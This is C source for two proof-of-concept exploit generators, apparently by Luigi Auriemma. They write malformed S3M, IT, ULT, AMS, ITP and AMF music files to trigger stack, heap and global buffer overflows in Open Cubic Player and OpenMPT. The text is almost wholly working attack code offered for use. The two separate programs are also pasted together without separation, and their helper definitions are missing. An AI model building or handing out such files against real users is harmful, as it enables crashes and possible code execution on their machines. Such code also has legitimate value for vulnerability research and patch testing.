int main(int argc, char *argv[]) {
FILE *fd;
s3m_t s3m;
it_t it;
ams_t ams;
int i,
j,
tmp,
attack;
char *fname;
setbuf(stdout, NULL);
fputs("\n"
"Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attacks:\n"
" 1 = buffer-overflow in mpLoadS3M (*.S3M)\n"
" 2 = buffer-overflow in itload.cpp (*.IT)\n"
" 3 = buffer-overflow in mpLoadULT (*.ULT)\n"
" 4 = buffer-overflow (envs) in mpLoadAMS (*.AMS)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
fname = argv[2];
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
if(attack == 1) {
memset(&s3m, 0, sizeof(s3m));
strncpy(s3m.name, POCNAME, sizeof(s3m.name));
s3m.kennung = 0x1a;
s3m.typ = 16;
s3m.ordnum = 800;
memcpy(s3m.scrm, "SCRM", 4);
fwrite(&s3m, sizeof(s3m), 1, fd);
for(i = 0; i < s3m.ordnum - 1; i++) fputc('a', fd);
fputc(0, fd); // for forcing "return errFormMiss"
} else if(attack == 2) {
memset(&it, 0, sizeof(it));
memcpy(it.sign, "IMPM", 4);
strncpy(it.name, POCNAME, sizeof(it.name));
it.Cmwt = 0x200;
it.OrdNum = 1000; // buffer-overflow
// it.InsNum = 200; // buffer-overflow
fwrite(&it, sizeof(it), 1, fd);
for(i = 0; i < 64; i++) fwi08(fd, 0);
for(i = 0; i < 64; i++) fwi08(fd, 0);
for(i = 0; i < it.OrdNum; i++) fwi08(fd, 'a');
for(i = 0; i < it.InsNum; i++) fwi32(fd, 'a');
for(i = 0; i < it.SmpNum; i++) fwi32(fd, 'a');
for(i = 0; i < it.PatNum; i++) fwi32(fd, 'a');
} else if(attack == 3) {
fwmem(fd, "MAS_UTrack_V00", 14);
fwi08(fd, 3 + '1');
fwstx(fd, POCNAME, 32);
fwi08(fd, 0); // msglen
fwi08(fd, 0); // insnum
fwbof(fd, 256, 0); // orders
tmp = 0x7f;
fwi08(fd, tmp); // chnn
fwi08(fd, 0); // patn
fwbof(fd, tmp, 'a'); // buffer-overflow
// possible heap overflow with chbp, patlength = 0
} else if(attack == 4) {
fwmem(fd, "AMShdr\x1A", 7); // sig
fwi08(fd, AMSNAMELEN); // sig[7]
fwbof(fd, AMSNAMELEN, 'a'); // name
fwi16(fd, 0x202); // filever
memset(&ams, 0, sizeof(ams));
ams.ins = 1;
fwrite(&ams, sizeof(ams), 1, fd);
for(j = 0; j < ams.ins; j++) {
fwi08(fd, AMSNAMELEN); // namelen
fwbof(fd, AMSNAMELEN, 'a'); // name
fwi08(fd, 1); // smpnum
fwbof(fd, 120, 0); // samptab
for(i = 0; i < 3; i++) { // envs
tmp = 0xff;
fwi08(fd, 0); // speed
fwi08(fd, 0); // sustain
fwi08(fd, 0); // loopstart
fwi08(fd, 0); // loopend
fwi08(fd, tmp); // points
fwbof(fd, tmp * 3, 'a');
}
}
} else {
printf("\nError: you must specify the right attack number\n");
}
fclose(fd);
printf("- finished\n");
return(0);
}
int main(int argc, char *argv[]) {
amf_head_t amf_head;
amf_smp_t amf_smp;
FILE *fd;
int i,
attack;
char *fname;
setbuf(stdout, NULL);
fputs("\n"
"OpenMPT <= 1.17.02.43 and SVN <= 157 stack and heap overflows "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attacks:\n"
" 1 = various global buffer overflows in ReadITProject (*.ITP)\n"
" 2 = heap overflow in ReadSample (*.AMF)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
fname = argv[2];
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
if(attack == 1) {
fwi32(fd, 0x2e697470); // .itp
fwi32(fd, 0x00000000); // version
fwi32(fd, ITPHEAPOVERSZ); // song name len
fwbof(fd, ITPHEAPOVERSZ, 'a'); // song name
fwi32(fd, 0); // comments len
fwi32(fd, SONG_ITPROJECT); // m_dwSongFlags
fwi32(fd, 128); // m_nDefaultGlobalVolume
fwi32(fd, 0); // m_nSongPreAmp
fwi32(fd, 0); // m_nDefaultSpeed
fwi32(fd, 0); // m_nDefaultTempo
fwi32(fd, 0); // m_nChannels
fwi32(fd, 0); // channel name len
// for(i=0; i<m_nChannels; i++){
fwi32(fd, 0); // LoadMixPlugins len
fwi32(fd, 0); // m_MidiCfg len
fwi32(fd, 0); // m_nInstruments
fwi32(fd, 0); // path instruments len
fwi32(fd, 0); // order len
fwi32(fd, 0); // number of patterns
fwi32(fd, 0); // m_nPatternNames
fwi32(fd, 0); // m_lpszPatternNames len
fwi32(fd, 0); // modcommand data length
fwi32(fd, 0); // m_nSamples
fwi32(fd, 0); // Read number of embeded samples
} else if(attack == 2) {
memset(&amf_head, 0, sizeof(amf_head));
memset(&amf_smp, 0, sizeof(amf_smp));
strcpy(amf_head.sign, "ASYLUM Music Format V1.0");
amf_head.patterns = 1;
amf_head.orders = 1;
fwrite(&amf_head, sizeof(amf_head), 1, fd);
for(i = 0; i < 64; i++) {
sprintf(amf_smp.name, "sample %d", i);
amf_smp.finetune = 0;
amf_smp.volume = 64;
amf_smp.length = ((0 - 6) - 39) + 16; // ReadSample and AllocateSample
amf_smp.reppos = 0;
amf_smp.replen = 0;
fwrite(&amf_smp, sizeof(amf_smp), 1, fd);
}
fwbof(fd, 64 * 32, 0x00);
fwbof(fd, ALLOCSAMPLESZ + HEAPOVERSZ, 'a');
}
fclose(fd);
printf("- finished\n");
return(0);
}
